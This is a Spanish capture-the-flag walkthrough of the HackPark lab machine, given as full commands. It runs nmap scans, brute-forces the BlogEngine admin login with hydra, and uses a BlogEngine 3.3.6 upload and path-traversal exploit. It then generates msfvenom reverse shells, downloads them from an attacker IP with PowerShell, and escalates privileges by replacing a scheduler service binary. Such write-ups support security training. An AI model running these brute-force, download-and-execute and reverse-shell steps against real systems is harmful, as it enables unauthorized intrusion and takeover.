HackPark

Scanning

sudo nmap -sS -p- --min-rate 5000 -vvv --open -Pn -n 10.10.65.121 -oG allports
nmap -sC -sV -p 80,3389 -Pn -n 10.10.65.121 -oN targeted

0408130121

80

Existe una pagina en /Account/login.aspx?ReturnURL=/admin/

0408140240

Usaremos hydra para sacar la contraseña, se probará con el usuario admin que es el usuario por defecto en blogengine

hydra -l admin -P /usr/share/wordlists/rockyou.txt -V 10.10.65.121 http-post-form '/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=96wqtyMMw%2ByGDvAbjpbjmZZ%2B3iTEcRk8bDEDhs%2BgLBvn50kWyqruNVQipjhdHpq0gQqlakvET2xXrV27q6dWHOqmdRmcJyfa010SwCcc6QWAcEkZTgCQzSTY%2Fvye2ET7OgmqFOVsG8qNN3HW%2FKXBJ6Ut8iQeffwVFhK0TXeg2eSX10SD7eKDNvkF7XbDNlUTMBI7u5tmZKPiGu44%2Bscq3otARP7CMNZL%2BY7ao2pYf0D4wJlQVVHNEsmbB%2Bcgy66WvkxEGrpCLES8fntQbgFjOC%2FjpiJ7zSxe5iwndEtxGpotFSbEnfvm55y6s%2BHBfGejw61dHikt4x4ZvRlo%2BgPemEz6avsNWhKAzvY8C5AC4fIFNxtE&__EVENTVALIDATION=NcoGunaTvYWBEZN5DLfjY0ZE1Sd0Aq0oCfFBnbycegHEk3BUrMbLyKVzUoK9kqVjVyVdjQTSX6cEeoXIAU%2FNNxh6Y8dCypO7DoAxpjIkPoOhO5kpEez56r0fE6RbuzyKtsl0IV2R9DtqgEnrW2TnR0XmHODZ2g2tyvhlZvxtxXQlpDcb&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n:Login failed'

0408140248

Searchsploit

# Buscamos la vulnerabilidad en searchsploit
searchsploit blogengine 3.3.6
# Lo descargamos
searchsploit -m aspx/webapps/46353.cs

El exploit nos indica que debemos modificar el archivo indicando nuestra IP y puerto al cual se va a conectar, ademas renombrar el archivo con el nombre de PostView.ascx

0408200825

Entramos a el siguiente enlace con la ip del sitio web http://10.10.10.10/admin/app/editor/editpost.cshtml y usamos el "file manager" para agregar archivos y subimos nuestro archivo PostView.ascx . Finalmente debemos estar escuchando con netcat con el puerto indicado en el archivo e ingresar a http://10.10.10.10/?theme=../../App_Data/files para que se arrancar el epxloit.

0408200839

Cambiar a una shell de meterpreter

# Crear la shell de meterpreter
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.13.243 LPORT=5555 -f exe -o meterpreter_shell.exe

Descargarlo desde la pc atacante

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.13.13.243:80/meterpreter_shell.exe','meterpreter_shell.exe')"

En la consola de metasploit escuchamos

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST your-ip
set LPORT listening-port
run

Ejecutamos la conexion

.\meterpreter_shell.exe

Escalar privilegios con el servicio Message.exe en C:\Program Files(x86)\SystemScheduler\Message.exe

Creamos una reverse shell de nombre Message.exe así como hicimos antes

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.13.243 LPORT=5432 -f exe -o Message.exe

y lo descargamos en C:\Program Files(x86)\SystemScheduler\Message.exe

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.13.13.243:80/Message.exe','Message.exe')"

Despues de unos segundos se tendrá la conexion en meterpreter y podemos usar cmd para que nos muestre el promt y ya estaríamos como Administrator a pesar de que cuando intento usar whoami no me responde. u.u

Sin usar meterpreter

Nos quedamos con la reverse shell usando netcat. Esta vez nos pasaremos a otra shell usando el comando:

msfvenom -p windows/shell_reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.13.243 LPORT=5555 -f exe -o windows_shell.exe

Escuchamos con netcat usando nc -lvp 5555

Descargamos la reverse shell antes generado con:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.13.13.243:80/windows_shell.exe','windows_shell.exe')"
.\windows_shell.exe

winpeas para analizar la maquina

usaremos este enlace https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASbat/winPEAS.bat y lo descargamos en la maquina con

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.13.13.243:80/winPEAS.batx86','winPEASx86.bat')"
.\winPEAS.bat

to be continue…